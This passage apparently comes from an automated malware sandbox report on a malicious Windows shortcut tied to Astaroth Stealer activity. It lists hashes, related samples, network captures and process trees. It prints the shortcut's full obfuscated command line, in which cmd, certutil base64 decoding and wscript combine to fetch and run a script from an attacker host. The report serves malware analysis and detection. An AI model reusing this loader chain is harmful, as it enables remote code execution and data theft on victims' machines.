                                                          https://api.mixpanel.com/track?data=eyJldmVudCI6ICIkY2FtcGFpZ25fbGlua19jbGljayIsICJwcm9wZXJ0aWVzIjogeyJjYW1wYWlnbl9pZCI6IDYyMjAzNDQsICJkaXN0aW5jdF9pZCI6ICJkYWZmY2VjMS0zNWRjLTQ3OTItOThjYy03ODMzZjRjNGM1OGQiLCAibWVzc2FnZV9pZCI6IDE0MDAwOTIsICJ0b2tlbiI6ICJlMzlhMGE0MGQ0OWRmMWNlMjI4ZjBmMWEwNzUwNWVjNCIsICJ0eXBlIjogImVtYWlsIiwgInVybCI6ICJodHRwczovL2F1ZGlvbWFjay5jb20vd29ybGQvcG9zdC9ib3R3LTctMjcifX0=&redirect=http://www.Bein.financerefinance.com.au?pid/a2luZ3JjQGJlaW4uY29tGet hashmaliciousBrowse
                                                          • 104.18.10.207
                                                          as.msiGet hashmaliciousBrowse
                                                          • 1.1.1.1
                                                          ohqt5Srs7g.elfGet hashmaliciousBrowse
                                                          • 104.22.149.27
                                                          VtAedZKmqz.elfGet hashmaliciousBrowse
                                                          • 104.27.81.27
                                                          Paperwork.exeGet hashmaliciousBrowse
                                                          • 104.21.47.166
                                                          file.exeGet hashmaliciousBrowse
                                                          • 188.114.96.3
                                                          https://mediafire.omaryemen.app/file/ob6whatsapp-download-apk/Get hashmaliciousBrowse
                                                          • 104.17.24.14
                                                          file.exeGet hashmaliciousBrowse
                                                          • 188.114.97.3
                                                          Payment Notice.exeGet hashmaliciousBrowse
                                                          • 104.21.77.241
                                                          file.exeGet hashmaliciousBrowse
                                                          • 188.114.96.3
                                                          #U30dc#U30a4#U30b9#U30e1#U30c3#U30bb#U30fc#U30b8.htmGet hashmaliciousBrowse
                                                          • 104.17.25.14
                                                          Employee Docu.shtmlGet hashmaliciousBrowse
                                                          • 104.17.25.14
                                                          file.exeGet hashmaliciousBrowse
                                                          • 188.114.96.3
                                                          Wire_berger_Tuesday-January-2023 0140 AM.shtmlGet hashmaliciousBrowse
                                                          • 104.16.89.20
                                                          file.exeGet hashmaliciousBrowse
                                                          • 188.114.96.3
                                                          file.exeGet hashmaliciousBrowse
                                                          • 188.114.96.3
                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          37f463bf4616ecd445d4a1937da06e19x6V6IyDvkG.cmdGet hashmaliciousBrowse
                                                          • 104.16.123.96
                                                          comunicazione.xlsGet hashmaliciousBrowse
                                                          • 104.16.123.96
                                                          file.exeGet hashmaliciousBrowse
                                                          • 104.16.123.96
                                                          comunicazione(1).xlsGet hashmaliciousBrowse
                                                          • 104.16.123.96
                                                          comunicazione(1)(1).xlsGet hashmaliciousBrowse
                                                          • 104.16.123.96
                                                          file.exeGet hashmaliciousBrowse
                                                          • 104.16.123.96
                                                          Scan Copy.exeGet hashmaliciousBrowse
                                                          • 104.16.123.96
                                                          comunicazione.xlsGet hashmaliciousBrowse
                                                          • 104.16.123.96
                                                          comunicazione.xlsGet hashmaliciousBrowse
                                                          • 104.16.123.96
                                                          https://1drv.ms/w/s!AnpG1SCOGRnjduLQaOjfoyMSkdcGet hashmaliciousBrowse
                                                          • 104.16.123.96
                                                          file.exeGet hashmaliciousBrowse
                                                          • 104.16.123.96
                                                          Destination Document pdf.exeGet hashmaliciousBrowse
                                                          • 104.16.123.96
                                                          Employee Docu.shtmlGet hashmaliciousBrowse
                                                          • 104.16.123.96
                                                          file.exeGet hashmaliciousBrowse
                                                          • 104.16.123.96
                                                          https://gatewaytoindiaanaheim.com/Get hashmaliciousBrowse
                                                          • 104.16.123.96
                                                          file.exeGet hashmaliciousBrowse
                                                          • 104.16.123.96
                                                          tmp8394.htmGet hashmaliciousBrowse
                                                          • 104.16.123.96
                                                          R5GxoyyhDv.exeGet hashmaliciousBrowse
                                                          • 104.16.123.96
                                                          Receipt_DOCS.htmGet hashmaliciousBrowse
                                                          • 104.16.123.96
                                                          https://cialfoinc.box.com/s/6wnfhds58x5k4vbbq2vfklgqd6eoyk7fGet hashmaliciousBrowse
                                                          • 104.16.123.96
                                                          No context
                                                          Process:C:\Windows\System32\cmd.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):108
                                                          Entropy (8bit):4.697147484425549
                                                          Encrypted:false
                                                          SSDEEP:3:qyuX+oOhDuXYHMWde5IYx1iHeYYGRZPyXXLcfvBRHfn:qyfv+3WdeRzke5IPynL0vnHf
                                                          MD5:3D8FB0FB90641271F11C02795AEAEFA1
                                                          SHA1:D2248D3C840633191E56D225136FD43F6237245B
                                                          SHA-256:F0CB27B5D3E72DD6BCF9CA34F67FBDABC89BA5494CA923498D2207866FE6634B
                                                          SHA-512:E4F47672E29942BF631B17946C8BDF5991BD46F8B3B98D9B6D7693B9FD9F44BB80A9420E33BB122D597AD09CB00911B13E97476126FF0FE3BCA86E716E81977F
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:var CfKr="sc"+"r";DfKr="ip"+"t:h";EfKr="T"+"tP"+":";GetObject(CfKr+DfKr+EfKr+"//niua9f.tabcoperoo.sbs/?1/");
                                                          File type:MS Windows shortcut, Item id list present, Has Working directory, Has command line arguments, Archive, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hidenormalshowminimized
                                                          Entropy (8bit):5.401600363387979
                                                          TrID:
                                                          • Windows Shortcut (20020/1) 100.00%
                                                          File name:Pyo37mDzQ2.lnk
                                                          File size:481
                                                          MD5:d52ac7755bd61b035235df79fabe1b59
                                                          SHA1:4e7a57f7c7fc8ee15cb390337983d116220c7625
                                                          SHA256:f3c3d2fae15f05589f8860df40d0533165484fb2975b2204c2f7cca750eb7b51
                                                          SHA512:880eaff5bd403739440ce8d1cdb56d4660cd9d72458414e6982806c2c8192508d80c59b9d49dfaf7fed012c8c924e9cde9391894f0cc6e3b7133e60d075dcacf
                                                          SSDEEP:12:8rflM8OBE6ZGQWgkxe5D5hex1tjdsLKOmesAzm74Uj1cSTj3pqexA:8loGQWFxed5he7taLKOg8m7jj1cuAe2
                                                          TLSH:B8F0AB9D90402D70E8296CB7CA820F106B5DFE830B002022039E029A8170A889E1E268
                                                          File Content Preview:L..................F1... ...................................................]....P.O. .:i.....+00.../C:\......................+.2...........wINdOws\sYSteM32\conHost.EXe.....C:\wINdOws\sYSteM32..%ComSpec% /V/D/c "md C:\9cEA9JA\>nul 2>&1 &&s^eT SEEH=C:\9cEA
                                                          Icon Hash:00828e868e89bd0d

                                                          General

                                                          Relative Path:
                                                          Command Line Argument:%ComSpec% /V/D/c "md C:\9cEA9JA\>nul 2>&1 &&s^eT SEEH=C:\9cEA9JA\^9cEA9JA.^jS&&echo dmFyIENmS3I9InNjIisiciI7RGZLcj0iaXAiKyJ0OmgiO0VmS3I9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDZktyK0RmS3IrRWZLcisiLy9uaXVhOWYudGFiY29wZXJvby5zYnMvPzEvIik7>!SEEH!&&cErtUtil -f -dEco^de !SEEH! !SEEH!&&ca^ll !SEEH!"
                                                          Icon location:
                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                          192.168.2.6104.21.40.8349711802851288 01/31/23-12:59:14.367073TCP2851288ETPRO TROJAN Astaroth Stealer Activity (GET)4971180192.168.2.6104.21.40.83
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Jan 31, 2023 12:59:14.349073887 CET4971180192.168.2.6104.21.40.83
                                                          Jan 31, 2023 12:59:14.366229057 CET8049711104.21.40.83192.168.2.6
                                                          Jan 31, 2023 12:59:14.366476059 CET4971180192.168.2.6104.21.40.83
                                                          Jan 31, 2023 12:59:14.367073059 CET4971180192.168.2.6104.21.40.83
                                                          Jan 31, 2023 12:59:14.384046078 CET8049711104.21.40.83192.168.2.6
                                                          Jan 31, 2023 12:59:14.581177950 CET8049711104.21.40.83192.168.2.6
                                                          Jan 31, 2023 12:59:14.581281900 CET4971180192.168.2.6104.21.40.83
                                                          Jan 31, 2023 12:59:14.638326883 CET49712443192.168.2.6104.16.123.96
                                                          Jan 31, 2023 12:59:14.638390064 CET44349712104.16.123.96192.168.2.6
                                                          Jan 31, 2023 12:59:14.638463020 CET49712443192.168.2.6104.16.123.96
                                                          Jan 31, 2023 12:59:14.778786898 CET49712443192.168.2.6104.16.123.96
                                                          Jan 31, 2023 12:59:14.778856993 CET44349712104.16.123.96192.168.2.6
                                                          Jan 31, 2023 12:59:14.828788996 CET44349712104.16.123.96192.168.2.6
                                                          Jan 31, 2023 12:59:14.828986883 CET49712443192.168.2.6104.16.123.96
                                                          Jan 31, 2023 12:59:15.208287001 CET49712443192.168.2.6104.16.123.96
                                                          Jan 31, 2023 12:59:15.208333969 CET44349712104.16.123.96192.168.2.6
                                                          Jan 31, 2023 12:59:15.208878040 CET44349712104.16.123.96192.168.2.6
                                                          Jan 31, 2023 12:59:15.209012985 CET49712443192.168.2.6104.16.123.96
                                                          Jan 31, 2023 12:59:15.212465048 CET49712443192.168.2.6104.16.123.96
                                                          Jan 31, 2023 12:59:15.212539911 CET44349712104.16.123.96192.168.2.6
                                                          Jan 31, 2023 12:59:15.262185097 CET44349712104.16.123.96192.168.2.6
                                                          Jan 31, 2023 12:59:15.262284040 CET44349712104.16.123.96192.168.2.6
                                                          Jan 31, 2023 12:59:15.262373924 CET49712443192.168.2.6104.16.123.96
                                                          Jan 31, 2023 12:59:15.262415886 CET49712443192.168.2.6104.16.123.96
                                                          Jan 31, 2023 12:59:15.281167984 CET49712443192.168.2.6104.16.123.96
                                                          Jan 31, 2023 12:59:15.281203985 CET44349712104.16.123.96192.168.2.6
                                                          Jan 31, 2023 12:59:18.240602016 CET4971180192.168.2.6104.21.40.83
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Jan 31, 2023 12:59:14.306969881 CET4944853192.168.2.68.8.8.8
                                                          Jan 31, 2023 12:59:14.331960917 CET53494488.8.8.8192.168.2.6
                                                          Jan 31, 2023 12:59:14.596761942 CET5908253192.168.2.68.8.8.8
                                                          Jan 31, 2023 12:59:14.620973110 CET53590828.8.8.8192.168.2.6
                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Jan 31, 2023 12:59:14.306969881 CET192.168.2.68.8.8.80x412bStandard query (0)niua9f.tabcoperoo.sbsA (IP address)IN (0x0001)false
                                                          Jan 31, 2023 12:59:14.596761942 CET192.168.2.68.8.8.80xef78Standard query (0)www.cloudflare.comA (IP address)IN (0x0001)false
                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Jan 31, 2023 12:59:14.331960917 CET8.8.8.8192.168.2.60x412bNo error (0)niua9f.tabcoperoo.sbs104.21.40.83A (IP address)IN (0x0001)false
                                                          Jan 31, 2023 12:59:14.331960917 CET8.8.8.8192.168.2.60x412bNo error (0)niua9f.tabcoperoo.sbs172.67.182.146A (IP address)IN (0x0001)false
                                                          Jan 31, 2023 12:59:14.620973110 CET8.8.8.8192.168.2.60xef78No error (0)www.cloudflare.com104.16.123.96A (IP address)IN (0x0001)false
                                                          Jan 31, 2023 12:59:14.620973110 CET8.8.8.8192.168.2.60xef78No error (0)www.cloudflare.com104.16.124.96A (IP address)IN (0x0001)false
                                                          • www.cloudflare.com
                                                          • niua9f.tabcoperoo.sbs
                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          0192.168.2.649712104.16.123.96443C:\Windows\System32\wscript.exe
                                                          TimestampkBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          1192.168.2.649711104.21.40.8380C:\Windows\System32\wscript.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Jan 31, 2023 12:59:14.367073059 CET0OUTGET /?1/ HTTP/1.1
                                                          Accept: */*
                                                          UA-CPU: AMD64
                                                          Accept-Encoding: gzip, deflate
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                          Host: niua9f.tabcoperoo.sbs
                                                          Connection: Keep-Alive
                                                          Jan 31, 2023 12:59:14.581177950 CET1INHTTP/1.1 302 Found
                                                          Date: Tue, 31 Jan 2023 11:59:14 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          Set-Cookie: PHPSESSID=ph6bdgmk5kmi4ieeaiip89pcap; path=/
                                                          Set-Cookie: pais=CH; expires=Wed, 05-Jan-2028 11:59:14 GMT; Max-Age=155520000; path=/
                                                          Set-Cookie: estado=CFXX; expires=Wed, 05-Jan-2028 11:59:14 GMT; Max-Age=155520000; path=/
                                                          Set-Cookie: cidade=CFXX; expires=Wed, 05-Jan-2028 11:59:14 GMT; Max-Age=155520000; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          Access-Control-Allow-Origin: *
                                                          Location: https://www.cloudflare.com/cdn-cgi/error
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8%2FpJ%2F3sS5vvHvlF3Tu2G54O7pFYBXBALzqmiMQNAovxhMKLwFGa%2Fo8fa5tqVwlDVevM9tLHHSm1o9FO%2FVlzhNGoNtyl1iQsBNR%2BsiMEL4e8T3n5OW14IWcmumQ9ay3IdhSgitNK%2FjOA%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 792247b2daad9b2e-FRA
                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                          Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          0192.168.2.649712104.16.123.96443C:\Windows\System32\wscript.exe
                                                          TimestampkBytes transferredDirectionData
                                                          2023-01-31 11:59:15 UTC0OUTGET /cdn-cgi/error HTTP/1.1
                                                          Accept: */*
                                                          UA-CPU: AMD64
                                                          Accept-Encoding: gzip, deflate
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                          Connection: Keep-Alive
                                                          Host: www.cloudflare.com
                                                          2023-01-31 11:59:15 UTC0INHTTP/1.1 404 Not Found
                                                          Date: Tue, 31 Jan 2023 11:59:15 GMT
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          CF-Cache-Status: MISS
                                                          Set-Cookie: __cf_bm=BIs2LD8_lhYDyYXTr0ymbzT_KjzhpIsN6DuljoTCxPg-1675166355-0-AV0FRZbQ/YWpHBGdw9CVjNw7G3I271nQZwq5VNc0+DtOmaDFBWm4yRe3SpBDVzanTI+rvMZJJ+XxqLF7XCOqemeSvMWAAipIG/oYn2fhIk83; path=/; expires=Tue, 31-Jan-23 12:29:15 GMT; domain=.www.cloudflare.com; HttpOnly; Secure; SameSite=None
                                                          Server-Timing: cf-q-config;dur=8.000002708286e-06
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hNqoFO77GrxC4JG2BDzytZSNLUsdJe6l4oWIHVR1%2FQiLT3nU62Aje%2BDZd%2FXg0%2BSlGBRK9IsQhcIJX3XRAcR%2F08liOBCIEl%2ByvnWfusySEzWgAXvDKFweB1o508oh0bj7gDofBA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Set-Cookie: __cflb=02DiuJFZNR1vT983reJ7ooDAdV9yu7NGmzFHzmddKWhKi; SameSite=None; Secure; path=/; expires=Wed, 01-Feb-23 10:59:15 GMT; HttpOnly
                                                          Server: cloudflare
                                                          CF-RAY: 792247b819f291f3-FRA
                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                          2023-01-31 11:59:15 UTC1INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Click to jump to process

                                                          Click to jump to process

                                                          Click to dive into process behavior distribution

                                                          Click to jump to process

                                                          Target ID:1
                                                          Start time:12:59:11
                                                          Start date:31/01/2023
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /V/D/c md C:\9cEA9JA\>nul 2>&1 &&s^eT SEEH=C:\9cEA9JA\^9cEA9JA.^jS&&echo dmFyIENmS3I9InNjIisiciI7RGZLcj0iaXAiKyJ0OmgiO0VmS3I9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDZktyK0RmS3IrRWZLcisiLy9uaXVhOWYudGFiY29wZXJvby5zYnMvPzEvIik7>!SEEH!&&cErtUtil -f -dEco^de !SEEH! !SEEH!&&ca^ll !SEEH!
                                                          Imagebase:0x7ff7cb270000
                                                          File size:273920 bytes
                                                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Target ID:2
                                                          Start time:12:59:11
                                                          Start date:31/01/2023
                                                          Path:C:\Windows\System32\certutil.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cErtUtil -f -dEcode C:\9cEA9JA\9cEA9JA.jS C:\9cEA9JA\9cEA9JA.jS
                                                          Imagebase:0x7ff638c70000
                                                          File size:1557504 bytes
                                                          MD5 hash:EB199893441CED4BBBCB547FE411CF2D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate

                                                          Target ID:3
                                                          Start time:12:59:12
                                                          Start date:31/01/2023
                                                          Path:C:\Windows\System32\wscript.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\WScript.exe" "C:\9cEA9JA\9cEA9JA.jS"
                                                          Imagebase:0x7ff64c9e0000
                                                          File size:163840 bytes
                                                          MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          No disassembly